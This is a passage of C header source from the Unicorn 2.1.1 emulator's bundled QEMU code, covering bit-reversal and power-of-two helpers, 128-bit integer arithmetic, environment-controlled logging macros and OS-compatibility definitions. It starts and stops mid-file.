@x: The value to modify. */ static inline uint16_t revbit16(uint16_t x) { /* Assign the correct byte position. */ x = bswap16(x); /* Assign the correct nibble position. */ x = ((x & 0xf0f0) >> 4) | ((x & 0x0f0f) << 4); /* Assign the correct bit position. */ x = ((x & 0x8888) >> 3) | ((x & 0x4444) >> 1) | ((x & 0x2222) << 1) | ((x & 0x1111) << 3); return x; } /** * revbit32 - reverse the bits in a 32-bit value. * @x: The value to modify. */ static inline uint32_t revbit32(uint32_t x) { /* Assign the correct byte position. */ x = bswap32(x); /* Assign the correct nibble position. */ x = ((x & 0xf0f0f0f0u) >> 4) | ((x & 0x0f0f0f0fu) << 4); /* Assign the correct bit position. */ x = ((x & 0x88888888u) >> 3) | ((x & 0x44444444u) >> 1) | ((x & 0x22222222u) << 1) | ((x & 0x11111111u) << 3); return x; } /** * revbit64 - reverse the bits in a 64-bit value. * @x: The value to modify. */ static inline uint64_t revbit64(uint64_t x) { /* Assign the correct byte position. */ x = bswap64(x); /* Assign the correct nibble position. */ x = ((x & 0xf0f0f0f0f0f0f0f0ull) >> 4) | ((x & 0x0f0f0f0f0f0f0f0full) << 4); /* Assign the correct bit position. */ x = ((x & 0x8888888888888888ull) >> 3) | ((x & 0x4444444444444444ull) >> 1) | ((x & 0x2222222222222222ull) << 1) | ((x & 0x1111111111111111ull) << 3); return x; } /* Host type specific sizes of these routines. */ #if ULONG_MAX == UINT32_MAX # define clzl clz32 # define ctzl ctz32 # define clol clo32 # define ctol cto32 # define ctpopl ctpop32 # define revbitl revbit32 #elif ULONG_MAX == UINT64_MAX # define clzl clz64 # define ctzl ctz64 # define clol clo64 # define ctol cto64 # define ctpopl ctpop64 # define revbitl revbit64 #else # error Unknown sizeof long #endif static inline bool is_power_of_2(uint64_t value) { if (!value) { return false; } return !(value & (value - 1)); } /** * Return @value rounded down to the nearest power of two or zero. 
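 * (Illustrative note, not from the original header: pow2floor(1000) == 512,
 * pow2floor(1024) == 1024 and pow2floor(0) == 0, while pow2ceil() below
 * gives pow2ceil(1000) == 1024 but wraps to 0 for values above 2^63.)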
*/ static inline uint64_t pow2floor(uint64_t value) { if (!value) { /* Avoid undefined shift by 64 */ return 0; } return 0x8000000000000000ull >> clz64(value); } /* * Return @value rounded up to the nearest power of two modulo 2^64. * This is *zero* for @value > 2^63, so be careful. */ static inline uint64_t pow2ceil(uint64_t value) { int n = clz64(value - 1); if (!n) { /* * @value - 1 has no leading zeroes, thus @value - 1 >= 2^63 * Therefore, either @value == 0 or @value > 2^63. * If it's 0, return 1, else return 0. */ return !value; } return 0x8000000000000000ull >> (n - 1); } static inline uint32_t pow2roundup32(uint32_t x) { x |= (x >> 1); x |= (x >> 2); x |= (x >> 4); x |= (x >> 8); x |= (x >> 16); return x + 1; } /** * urshift - 128-bit Unsigned Right Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bits to shift, between 0 and 127. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void urshift(uint64_t *plow, uint64_t *phigh, int32_t shift); /** * ulshift - 128-bit Unsigned Left Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bits to shift, between 0 and 127. * @overflow: out - true if any 1-bit is shifted out. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void ulshift(uint64_t *plow, uint64_t *phigh, int32_t shift, bool *overflow); #endif

unicorn-2.1.1/qemu/include/qemu/int128.h

#ifndef INT128_H #define INT128_H #include "qemu/bswap.h" #ifdef CONFIG_INT128 typedef __int128_t Int128; static inline Int128 int128_make64(uint64_t a) { return a; } static inline Int128 int128_make128(uint64_t lo, uint64_t hi) { return (__uint128_t)hi << 64 | lo; } static inline uint64_t int128_get64(Int128 a) { uint64_t r = a; assert(r == a); return r; } static inline uint64_t int128_getlo(Int128 a) { return a; } static inline int64_t int128_gethi(Int128 a) { return a >> 64; } static inline Int128 int128_zero(void) { return 0; } static inline Int128 int128_one(void) { return 1; } static inline Int128 int128_2_64(void) { return (Int128)1 << 64; } static inline Int128 int128_exts64(int64_t a) { return a; } static inline Int128 int128_and(Int128 a, Int128 b) { return a & b; } static inline Int128 int128_rshift(Int128 a, int n) { return a >> n; } static inline Int128 int128_add(Int128 a, Int128 b) { return a + b; } static inline Int128 int128_neg(Int128 a) { return -a; } static inline Int128
int128_sub(Int128 a, Int128 b) { return a - b; } static inline bool int128_nonneg(Int128 a) { return a >= 0; } static inline bool int128_eq(Int128 a, Int128 b) { return a == b; } static inline bool int128_ne(Int128 a, Int128 b) { return a != b; } static inline bool int128_ge(Int128 a, Int128 b) { return a >= b; } static inline bool int128_lt(Int128 a, Int128 b) { return a < b; } static inline bool int128_le(Int128 a, Int128 b) { return a <= b; } static inline bool int128_gt(Int128 a, Int128 b) { return a > b; } static inline bool int128_nz(Int128 a) { return a != 0; } static inline Int128 int128_min(Int128 a, Int128 b) { return a < b ? a : b; } static inline Int128 int128_max(Int128 a, Int128 b) { return a > b ? a : b; } static inline void int128_addto(Int128 *a, Int128 b) { *a += b; } static inline void int128_subfrom(Int128 *a, Int128 b) { *a -= b; } static inline Int128 bswap128(Int128 a) { return int128_make128(bswap64(int128_gethi(a)), bswap64(int128_getlo(a))); } #else /* !CONFIG_INT128 */ typedef struct Int128 Int128; #if !(defined(_MSC_VER) && defined(__clang__)) typedef Int128 __int128_t; #endif struct Int128 { uint64_t lo; int64_t hi; }; static inline Int128 int128_make64(uint64_t a) { return (Int128) { a, 0 }; } static inline Int128 int128_make128(uint64_t lo, uint64_t hi) { return (Int128) { lo, hi }; } static inline uint64_t int128_get64(Int128 a) { assert(!a.hi); return a.lo; } static inline uint64_t int128_getlo(Int128 a) { return a.lo; } static inline int64_t int128_gethi(Int128 a) { return a.hi; } static inline Int128 int128_zero(void) { return int128_make64(0); } static inline Int128 int128_one(void) { return int128_make64(1); } static inline Int128 int128_2_64(void) { return (Int128) { 0, 1 }; } static inline Int128 int128_exts64(int64_t a) { return (Int128) { .lo = a, .hi = (a < 0) ? -1 : 0 }; } static inline Int128 int128_and(Int128 a, Int128 b) { return (Int128) { a.lo & b.lo, a.hi & b.hi }; } static inline Int128 int128_rshift(Int128 a, int n) { int64_t h; if (!n) { return a; } h = a.hi >> (n & 63); if (n >= 64) { return int128_make128(h, h >> 63); } else { return int128_make128((a.lo >> n) | ((uint64_t)a.hi << (64 - n)), h); } } static inline Int128 int128_add(Int128 a, Int128 b) { uint64_t lo = a.lo + b.lo; /* a.lo <= a.lo + b.lo < a.lo + k (k is the base, 2^64). Hence, * a.lo + b.lo >= k implies 0 <= lo = a.lo + b.lo - k < a.lo. * Similarly, a.lo + b.lo < k implies a.lo <= lo = a.lo + b.lo < k. * * So the carry is lo < a.lo. 
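 *
 * Worked example: with a.lo == UINT64_MAX and b.lo == 1, lo wraps to 0,
 * and 0 < a.lo, so a carry of 1 propagates into the high word.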
 */
    return int128_make128(lo, (uint64_t)a.hi + b.hi + (lo < a.lo));
}

static inline Int128 int128_neg(Int128 a)
{
#ifdef _MSC_VER
    uint64_t lo = a.lo;
    lo = 0 - lo;
#else
    uint64_t lo = (uint64_t)(-a.lo);
#endif
    return int128_make128(lo, ~(uint64_t)a.hi + !lo);
}

static inline Int128 int128_sub(Int128 a, Int128 b)
{
    return int128_make128(a.lo - b.lo, (uint64_t)a.hi - b.hi - (a.lo < b.lo));
}

static inline bool int128_nonneg(Int128 a)
{
    return a.hi >= 0;
}

static inline bool int128_eq(Int128 a, Int128 b)
{
    return a.lo == b.lo && a.hi == b.hi;
}

static inline bool int128_ne(Int128 a, Int128 b)
{
    return !int128_eq(a, b);
}

static inline bool int128_ge(Int128 a, Int128 b)
{
    return a.hi > b.hi || (a.hi == b.hi && a.lo >= b.lo);
}

static inline bool int128_lt(Int128 a, Int128 b)
{
    return !int128_ge(a, b);
}

static inline bool int128_le(Int128 a, Int128 b)
{
    return int128_ge(b, a);
}

static inline bool int128_gt(Int128 a, Int128 b)
{
    return !int128_le(a, b);
}

static inline bool int128_nz(Int128 a)
{
    return a.lo || a.hi;
}

static inline Int128 int128_min(Int128 a, Int128 b)
{
    return int128_le(a, b) ? a : b;
}

static inline Int128 int128_max(Int128 a, Int128 b)
{
    return int128_ge(a, b) ? a : b;
}

static inline void int128_addto(Int128 *a, Int128 b)
{
    *a = int128_add(*a, b);
}

static inline void int128_subfrom(Int128 *a, Int128 b)
{
    *a = int128_sub(*a, b);
}

static inline Int128 bswap128(Int128 a)
{
    return int128_make128(bswap64(int128_gethi(a)), bswap64(int128_getlo(a)));
}

#endif /* CONFIG_INT128 */
#endif /* INT128_H */

unicorn-2.1.1/qemu/include/qemu/log.h

#ifndef QEMU_LOG_H
#define QEMU_LOG_H

#define CPU_LOG_TB_OUT_ASM (1 << 0)
#define CPU_LOG_TB_IN_ASM  (1 << 1)
#define CPU_LOG_TB_OP      (1 << 2)
#define CPU_LOG_TB_OP_OPT  (1 << 3)
#define CPU_LOG_INT        (1 << 4)
#define CPU_LOG_EXEC       (1 << 5)
#define CPU_LOG_PCALL      (1 << 6)
#define CPU_LOG_TB_CPU     (1 << 8)
#define CPU_LOG_RESET      (1 << 9)
#define LOG_UNIMP          (1 << 10)
#define LOG_GUEST_ERROR    (1 << 11)
#define CPU_LOG_MMU        (1 << 12)
#define CPU_LOG_TB_NOCHAIN (1 << 13)
#define CPU_LOG_PAGE       (1 << 14)
/* LOG_TRACE (1 << 15) is defined in log-for-trace.h */
#define CPU_LOG_TB_OP_IND  (1 << 16)
#define CPU_LOG_TB_FPU     (1 << 17)
#define CPU_LOG_PLUGIN     (1 << 18)
/* LOG_STRACE is used for user-mode strace logging. */
#define LOG_STRACE         (1 << 19)

/* Lock output for a series of related logs. Since this is not needed
 * for a single qemu_log / qemu_log_mask / qemu_log_mask_and_addr, we
 * assume that qemu_loglevel_mask has already been tested, and that
 * qemu_loglevel is never set when qemu_logfile is unset.
 */

/* Logging functions: */

/* To enable verbose logging, uncomment the next line.
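 * Logging is then controlled at run time through the UNICORN_LOG_LEVEL and
 * UNICORN_LOG_DETAIL_LEVEL environment variables read below, e.g. (the tool
 * name and values are illustrative):
 *
 *     UNICORN_LOG_LEVEL=0x2 UNICORN_LOG_DETAIL_LEVEL=2 ./my-unicorn-tool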
 */
//#define UNICORN_LOGGING // to enable logging

#ifdef UNICORN_LOGGING

#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdbool.h>

/**
 * Reads @p env_name and tries to parse the value into a uint32_t.
 * @param env_name The environment variable name to parse.
 * @return The parsed value.
 **        0 if the value cannot be parsed (or is 0).
 **        ULONG_MAX if the value does not fit into a uint32_t.
 */
static inline uint32_t read_and_parse_env(const char *env_name)
{
    uint32_t data = 0;
    const char *env_data = getenv(env_name);
    if (env_data != NULL) {
        char buffer[11] = {0}; // room for "0xFFFFFFFF" plus terminating NUL
        strncpy(buffer, env_data, sizeof(buffer) - 1);
        data = (uint32_t)strtoul(buffer, NULL, 0);
    }
    return data;
}

/**
 * Gets the log level, reading it from the environment only once.
 * @return The log level.
 */
static inline uint32_t get_log_level(void)
{
    static uint64_t log_level = UINT64_MAX;
    if (log_level == UINT64_MAX) {
        log_level = read_and_parse_env("UNICORN_LOG_LEVEL");
    }
    return (uint32_t)log_level;
}

/**
 * Gets the log detail level, reading it from the environment only once.
 * @return The detail log level.
 */
static inline uint32_t get_log_detail_level(void)
{
    static uint64_t log_detail_level = UINT64_MAX;
    if (log_detail_level == UINT64_MAX) {
        log_detail_level = read_and_parse_env("UNICORN_LOG_DETAIL_LEVEL");
    }
    return (uint32_t)log_detail_level;
}

/**
 * Checks if the @p log_level is active.
 * @param log_level The log level to be checked.
 * @return True if the log level is active.
 */
static inline bool is_log_level_active(uint32_t log_level)
{
    const uint32_t active_log_level = get_log_level();
    const bool is_active = (active_log_level & log_level) == log_level;
    return is_active;
}

/**
 * Checks if logging is enabled.
 * @return True if enabled, else false.
 */
static inline bool is_logging_enabled(void)
{
    const uint32_t log_level = get_log_level();
    return log_level != 0;
}

/**
 * Gets the filename of the caller at the given @p detail_level.
 * @param filename The filename to process.
 * @param detail_level The level of detail of the filename.
 **        0: Returns an empty string.
 **        1: Returns the full filename including its path.
 **        2: Returns just the filename (to shorten the log).
 * @return Always a valid null-terminated string. Do NOT free it.
 */
static inline const char *get_detailed_filename(const char *filename,
                                                int detail_level)
{
    filename = (filename != NULL) ? filename : "";
    const char *resulting_filename = filename;

#if (defined(WIN32) || defined(WIN64) || defined(_WIN32) || defined(_WIN64))
    const char path_separator = '\\';
#else
    const char path_separator = '/';
#endif

    switch (detail_level) {
    default:
    case 0:
        resulting_filename = "";
        break;
    case 1:
        resulting_filename = filename;
        break;
    case 2:
        resulting_filename = strrchr(filename, path_separator);
        if (resulting_filename == NULL) {
            resulting_filename = filename;
        } else {
            ++resulting_filename;
        }
        break;
    }
    return resulting_filename;
}

/**
 * Prints the formatted log message, with details if enabled.
 * @param mask The log mask to log on.
 * @param filename The filename of the caller.
 * @param line The line number of the caller.
 * @param fmt Printf-style format string.
 * @param ... Optional arguments for the format string.
 */
static inline void print_log(uint32_t mask, const char *filename,
                             uint32_t line, const char *fmt, ...)
{
    if ((mask & get_log_level()) == 0) {
        return;
    }

    const uint32_t log_detail_level = get_log_detail_level();
    if (log_detail_level > 0) {
        const char *detailed_filename =
            get_detailed_filename(filename, log_detail_level);
        printf("[%s:%u] ", detailed_filename, line);
    }

    va_list argptr;
    va_start(argptr, fmt);
    vfprintf(stdout, fmt, argptr);
    va_end(argptr);
}

/**
 * Logs only if the right log level is set.
 * @param mask The log mask to log on.
 * @param fmt Printf-style format string.
 * @param ... Optional arguments for the format string.
 */
#define LOG_MESSAGE(mask, fmt, ...) \
    do { \
        print_log(mask, __FILE__, __LINE__, fmt, ## __VA_ARGS__); \
    } while (0)

#else

#define LOG_MESSAGE(mask, fmt, ...)

/**
 * Dummy implementation which always returns false.
 * @return Always false.
 */
static inline bool is_logging_enabled(void)
{
    return false;
}

/**
 * Dummy implementation which always returns false.
 * @param level The log level to be checked.
 * @return Always false.
 */
static inline bool is_log_level_active(uint32_t level)
{
    (void)level;
    return false;
}

#endif /* UNICORN_LOGGING */

/**
 * Logs only if the right log level is set.
 * @param mask The log mask to log on.
 * @param fmt Printf-style format string.
 * @param ... Optional arguments for the format string.
 */
#define qemu_log_mask(mask, fmt, ...) \
    LOG_MESSAGE(mask, fmt, ## __VA_ARGS__)

#endif /* QEMU_LOG_H */

unicorn-2.1.1/qemu/include/qemu/osdep.h

/*
 * OS includes and handling of OS dependencies
 *
 * This header exists to pull in some common system headers that
 * most code in QEMU will want, and to fix up some possible issues with
 * them (missing defines, Windows weirdness, and so on).
 *
 * To avoid getting into possible circular include dependencies, this
 * file should not include any other QEMU headers, with the exceptions
 * of config-host.h, config-target.h, qemu/compiler.h,
 * sysemu/os-posix.h, sysemu/os-win32.h, glib-compat.h and
 * qemu/typedefs.h, all of which are doing a similar job to this file
 * and are under similar constraints.
 *
 * This header also contains prototypes for functions defined in
 * os-*.c and util/oslib-*.c; those would probably be better split
 * out into separate header files.
 *
 * In an ideal world this header would contain only:
 *  (1) things which everybody needs
 *  (2) things without which code would work on most platforms but
 *      fail to compile or misbehave on a minority of host OSes
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
*/ #ifndef QEMU_OSDEP_H #define QEMU_OSDEP_H #include "config-host.h" #ifdef NEED_CPU_H #include "config-target.h" #else #include "exec/poison.h" #endif #include "qemu/compiler.h" struct uc_struct; /* Older versions of C++ don't get definitions of various macros from * stdlib.h unless we define these macros before first inclusion of * that system header. */ #ifndef __STDC_CONSTANT_MACROS #define __STDC_CONSTANT_MACROS #endif #ifndef __STDC_LIMIT_MACROS #define __STDC_LIMIT_MACROS #endif #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS #endif #ifdef _WIN32 /* as defined in sdkddkver.h */ #ifndef _WIN32_WINNT #define _WIN32_WINNT 0x0600 /* Vista */ #endif /* reduces the number of implicitly included headers */ #ifndef WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN #endif #endif /* enable C99/POSIX format strings (needs mingw32-runtime 3.15 or later) */ #ifdef __MINGW32__ #ifndef __USE_MINGW_ANSI_STDIO #define __USE_MINGW_ANSI_STDIO 1 #endif // __USE_MINGW_ANSI_STDIO #endif #include <stdarg.h> #include <stddef.h> #include <stdbool.h> #include <stdint.h> #include <sys/types.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <inttypes.h> #include <limits.h> #include <unicorn/platform.h> #include <time.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <sys/stat.h> #include <assert.h> /* setjmp must be declared before sysemu/os-win32.h * because it is redefined there. */ #include <setjmp.h> #include <signal.h> #ifdef __OpenBSD__ #include <sys/signal.h> #endif #ifndef _WIN32 #include <sys/wait.h> #else #define WIFEXITED(x) 1 #define WEXITSTATUS(x) (x) #endif #ifdef _WIN32 #include "sysemu/os-win32.h" #endif #ifdef CONFIG_POSIX #include "sys/mman.h" #endif /* * Only allow MAP_JIT for Mojave or later. * * Source: https://github.com/moby/hyperkit/pull/259/files#diff-e6b5417230ff2daff9155d9b15aefae12e89410ec2dca1f59d04be511f6737fcR41 * * But using MAP_JIT causes performance regression for fork() so we only use MAP_JIT on Apple M1. * * Issue: https://github.com/desktop/desktop/issues/12978 */ // Even if we don't have sprr available (mostly in virtual machine), we still need MAP_JIT though there is no // protection enforced. #if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && (defined(__arm__) || defined(__aarch64__)) #define USE_MAP_JIT #endif #include <glib_compat.h> #include "qemu/typedefs.h" /* Starting on QEMU 2.5, qemu_hw_version() returns "2.5+" by default * instead of QEMU_VERSION, so setting hw_version on MachineClass * is no longer mandatory. * * Do NOT change this string, or it will break compatibility on all * machine classes that don't set hw_version. */ #define QEMU_HW_VERSION "2.5+" /* * For mingw, as of v6.0.0, the function implementing the assert macro is * not marked as noreturn, so the compiler cannot delete code following an * assert(false) as unused. We rely on this within the code base to delete * code that is unreachable when features are disabled. * All supported versions of Glib's g_assert() satisfy this requirement. */ // Unfortunately, NDK and arm32 also have this problem. #if defined(__MINGW32__ ) || defined(__ANDROID__) || defined(__i386__) || defined(__arm__) #undef assert #define assert(x) g_assert(x) #endif /* * According to waitpid man page: * WCOREDUMP * This macro is not specified in POSIX.1-2001 and is not * available on some UNIX implementations (e.g., AIX, SunOS). * Therefore, enclose its use inside #ifdef WCOREDUMP ... #endif. 
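 *
 * A minimal sketch of that pattern (illustrative, using a hypothetical
 * status variable):
 *
 *     #ifdef WCOREDUMP
 *     if (WCOREDUMP(status)) { ... }
 *     #endif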
*/ #ifndef WCOREDUMP #define WCOREDUMP(status) 0 #endif /* * We have a lot of unaudited code that may fail in strange ways, or * even be a security risk during migration, if you disable assertions * at compile-time. You may comment out these safety checks if you * absolutely want to disable assertion overhead, but it is not * supported upstream so the risk is all yours. Meanwhile, please * submit patches to remove any side-effects inside an assertion, or * fixing error handling that should use Error instead of assert. */ #ifdef G_DISABLE_ASSERT #error building with G_DISABLE_ASSERT is not supported #endif #ifndef O_LARGEFILE #define O_LARGEFILE 0 #endif #ifndef O_BINARY #define O_BINARY 0 #endif #ifndef MAP_ANONYMOUS #define MAP_ANONYMOUS MAP_ANON #endif #ifndef ENOMEDIUM #define ENOMEDIUM ENODEV #endif #if !defined(ENOTSUP) #define ENOTSUP 4096 #endif #if !defined(ECANCELED) #define ECANCELED 4097 #endif #if !defined(EMEDIUMTYPE) #define EMEDIUMTYPE 4098 #endif #if !defined(ESHUTDOWN) #define ESHUTDOWN 4099 #endif /* time_t may be either 32 or 64 bits depending on the host OS, and * can be either signed or unsigned, so we can't just hardcode a * specific maximum value. This is not a C preprocessor constant, * so you can't use TIME_MAX in an #ifdef, but for our purposes * this isn't a problem. */ /* The macros TYPE_SIGNED, TYPE_WIDTH, and TYPE_MAXIMUM are from * Gnulib, and are under the LGPL v2.1 or (at your option) any * later version. */ /* True if the real type T is signed. */ #define TYPE_SIGNED(t) (!((t)0 < (t)-1)) /* The width in bits of the integer type or expression T. * Padding bits are not supported. */ #define TYPE_WIDTH(t) (sizeof(t) * CHAR_BIT) /* The maximum and minimum values for the integer type T. */ #define TYPE_MAXIMUM(t) \ ((t) (!TYPE_SIGNED(t) \ ? (t)-1 \ : ((((t)1 << (TYPE_WIDTH(t) - 2)) - 1) * 2 + 1))) #ifndef TIME_MAX #define TIME_MAX TYPE_MAXIMUM(time_t) #endif /* HOST_LONG_BITS is the size of a native pointer in bits. */ #if UINTPTR_MAX == UINT32_MAX # define HOST_LONG_BITS 32 #elif UINTPTR_MAX == UINT64_MAX # define HOST_LONG_BITS 64 #else # error Unknown pointer size #endif /* Mac OSX has a <stdint.h> bug that incorrectly defines SIZE_MAX with * the wrong type. Our replacement isn't usable in preprocessor * expressions, but it is sufficient for our needs. */ #if defined(HAVE_BROKEN_SIZE_MAX) && HAVE_BROKEN_SIZE_MAX #undef SIZE_MAX #define SIZE_MAX ((size_t)-1) #endif #ifndef MIN #define MIN(a, b) (((a) < (b)) ? (a) : (b)) #endif #ifndef MAX #define MAX(a, b) (((a) > (b)) ? (a) : (b)) #endif /* Minimum function that returns zero only iff both values are zero. * Intended for use with unsigned values only. */ #ifndef MIN_NON_ZERO #define MIN_NON_ZERO(a, b) ((a) == 0 ? (b) : \ ((b) == 0 ? (a) : (MIN(a, b)))) #endif /* Round number down to multiple */ #define QEMU_ALIGN_DOWN(n, m) ((n) / (m) * (m)) /* Round number up to multiple. 
Safe when m is not a power of 2 (see * ROUND_UP for a faster version when a power of 2 is guaranteed) */ #define QEMU_ALIGN_UP(n, m) QEMU_ALIGN_DOWN((n) + (m) - 1, (m)) /* Check if n is a multiple of m */ #define QEMU_IS_ALIGNED(n, m) (((n) % (m)) == 0) /* n-byte align pointer down */ #ifdef _MSC_VER #define QEMU_ALIGN_PTR_DOWN(p, n) (QEMU_ALIGN_DOWN((uintptr_t)(p), (n))) #else #define QEMU_ALIGN_PTR_DOWN(p, n) ((typeof(p))QEMU_ALIGN_DOWN((uintptr_t)(p), (n))) #endif /* n-byte align pointer up */ #ifndef _MSC_VER #define QEMU_ALIGN_PTR_UP(p, n) ((typeof(p))QEMU_ALIGN_UP((uintptr_t)(p), (n))) #else #define QEMU_ALIGN_PTR_UP(p, n) QEMU_ALIGN_UP((uintptr_t)(p), (n)) #endif /* Check if pointer p is n-bytes aligned */ #define QEMU_PTR_IS_ALIGNED(p, n) QEMU_IS_ALIGNED((uintptr_t)(p), (n)) /* Round number up to multiple. Requires that d be a power of 2 (see * QEMU_ALIGN_UP for a safer but slower version on arbitrary * numbers); works even if d is a smaller type than n. */ #ifndef ROUND_UP #ifdef _MSC_VER #define ROUND_UP(n, d) (((n) + (d) - 1) & (0 - (0 ? (n) : (d)))) #else #define ROUND_UP(n, d) (((n) + (d) - 1) & -(0 ? (n) : (d))) #endif #endif #ifndef DIV_ROUND_UP #define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d)) #endif /* * &(x)[0] is always a pointer - if it's same type as x then the argument is a * pointer, not an array. */ #define QEMU_IS_ARRAY(x) (!__builtin_types_compatible_p(typeof(x), \ typeof(&(x)[0]))) #ifndef ARRAY_SIZE #ifndef _MSC_VER #define ARRAY_SIZE(x) ((sizeof(x) / sizeof((x)[0])) + \ QEMU_BUILD_BUG_ON_ZERO(!QEMU_IS_ARRAY(x))) #else #define ARRAY_SIZE(x) (sizeof(x) / sizeof(x[0])) #endif #endif void *qemu_try_memalign(size_t alignment, size_t size); void *qemu_memalign(size_t alignment, size_t size); void *qemu_anon_ram_alloc(struct uc_struct *uc, size_t size, uint64_t *align); void qemu_vfree(void *ptr); void qemu_anon_ram_free(struct uc_struct *uc, void *ptr, size_t size); #define QEMU_MADV_INVALID -1 #if defined(CONFIG_MADVISE) #define QEMU_MADV_WILLNEED MADV_WILLNEED #define QEMU_MADV_DONTNEED MADV_DONTNEED #ifdef MADV_DONTFORK #define QEMU_MADV_DONTFORK MADV_DONTFORK #else #define QEMU_MADV_DONTFORK QEMU_MADV_INVALID #endif #ifdef MADV_MERGEABLE #define QEMU_MADV_MERGEABLE MADV_MERGEABLE #else #define QEMU_MADV_MERGEABLE QEMU_MADV_INVALID #endif #ifdef MADV_UNMERGEABLE #define QEMU_MADV_UNMERGEABLE MADV_UNMERGEABLE #else #define QEMU_MADV_UNMERGEABLE QEMU_MADV_INVALID #endif #ifdef MADV_DODUMP #define QEMU_MADV_DODUMP MADV_DODUMP #else #define QEMU_MADV_DODUMP QEMU_MADV_INVALID #endif #ifdef MADV_DONTDUMP #define QEMU_MADV_DONTDUMP MADV_DONTDUMP #else #define QEMU_MADV_DONTDUMP QEMU_MADV_INVALID #endif #ifdef MADV_HUGEPAGE #define QEMU_MADV_HUGEPAGE MADV_HUGEPAGE #else #define QEMU_MADV_HUGEPAGE QEMU_MADV_INVALID #endif #ifdef MADV_NOHUGEPAGE #define QEMU_MADV_NOHUGEPAGE MADV_NOHUGEPAGE #else #define QEMU_MADV_NOHUGEPAGE QEMU_MADV_INVALID #endif #ifdef MADV_REMOVE #define QEMU_MADV_REMOVE MADV_REMOVE #else #define QEMU_MADV_REMOVE QEMU_MADV_INVALID #endif #elif defined(CONFIG_POSIX_MADVISE) #define QEMU_MADV_WILLNEED POSIX_MADV_WILLNEED #define QEMU_MADV_DONTNEED POSIX_MADV_DONTNEED #define QEMU_MADV_DONTFORK QEMU_MADV_INVALID #define QEMU_MADV_MERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_UNMERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_DODUMP QEMU_MADV_INVALID #define QEMU_MADV_DONTDUMP QEMU_MADV_INVALID #define QEMU_MADV_HUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_NOHUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_REMOVE QEMU_MADV_INVALID #else /* no-op */ #define 
QEMU_MADV_WILLNEED QEMU_MADV_INVALID #define QEMU_MADV_DONTNEED QEMU_MADV_INVALID #define QEMU_MADV_DONTFORK QEMU_MADV_INVALID #define QEMU_MADV_MERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_UNMERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_DODUMP QEMU_MADV_INVALID #define QEMU_MADV_DONTDUMP QEMU_MADV_INVALID #define QEMU_MADV_HUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_NOHUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_REMOVE QEMU_MADV_INVALID #endif #ifdef _WIN32 #define HAVE_CHARDEV_SERIAL 1 #elif defined(__linux__) || defined(__sun__) || defined(__FreeBSD__) \ || defined(__NetBSD__) || defined(__OpenBSD__) || defined(__DragonFly__) \ || defined(__GLIBC__) #define HAVE_CHARDEV_SERIAL 1 #endif #if defined(__linux__) || defined(__FreeBSD__) || \ defined(__FreeBSD_kernel__) || defined(__DragonFly__) #define HAVE_CHARDEV_PARPORT 1 #endif #if defined(CONFIG_LINUX) #ifndef BUS_MCEERR_AR #define BUS_MCEERR_AR 4 #endif #ifndef BUS_MCEERR_AO #define BUS_MCEERR_AO 5 #endif #endif #if defined(__linux__) && \ (defined(__x86_64__) || defined(__arm__) || defined(__aarch64__) \ || defined(__powerpc64__)) /* Use 2 MiB alignment so transparent hugepages can be used by KVM. Valgrind does not support alignments larger than 1 MiB, therefore we need special code which handles running on Valgrind. */ # define QEMU_VMALLOC_ALIGN (512 * 4096) #elif defined(__linux__) && defined(__s390x__) /* Use 1 MiB (segment size) alignment so gmap can be used by KVM. */ # define QEMU_VMALLOC_ALIGN (256 * 4096) #elif defined(__linux__) && defined(__sparc__) #include <sys/shm.h> # define QEMU_VMALLOC_ALIGN MAX(uc->qemu_real_host_page_size, SHMLBA) #else # define QEMU_VMALLOC_ALIGN uc->qemu_real_host_page_size #endif #ifdef CONFIG_POSIX struct qemu_signalfd_siginfo { uint32_t ssi_signo; /* Signal number */ int32_t ssi_errno; /* Error number (unused) */ int32_t ssi_code; /* Signal code */ uint32_t ssi_pid; /* PID of sender */ uint32_t ssi_uid; /* Real UID of sender */ int32_t ssi_fd; /* File descriptor (SIGIO) */ uint32_t ssi_tid; /* Kernel timer ID (POSIX timers) */ uint32_t ssi_band; /* Band event (SIGIO) */ uint32_t ssi_overrun; /* POSIX timer overrun count */ uint32_t ssi_trapno; /* Trap number that caused signal */ int32_t ssi_status; /* Exit status or signal (SIGCHLD) */ int32_t ssi_int; /* Integer sent by sigqueue(2) */ uint64_t ssi_ptr; /* Pointer sent by sigqueue(2) */ uint64_t ssi_utime; /* User CPU time consumed (SIGCHLD) */ uint64_t ssi_stime; /* System CPU time consumed (SIGCHLD) */ uint64_t ssi_addr; /* Address that generated signal (for hardware-generated signals) */ uint8_t pad[48]; /* Pad size to 128 bytes (allow for additional fields in the future) */ }; #endif int qemu_madvise(void *addr, size_t len, int advice); int qemu_mprotect_rwx(void *addr, size_t size); int qemu_mprotect_none(void *addr, size_t size); #if defined(__HAIKU__) && defined(__i386__) #define FMT_pid "%ld" #elif defined(WIN64) #define FMT_pid "%" PRId64 #else #define FMT_pid "%d" #endif int qemu_get_thread_id(void); #ifdef _WIN32 static inline void qemu_timersub(const struct timeval *val1, const struct timeval *val2, struct timeval *res) { res->tv_sec = val1->tv_sec - val2->tv_sec; if (val1->tv_usec < val2->tv_usec) { 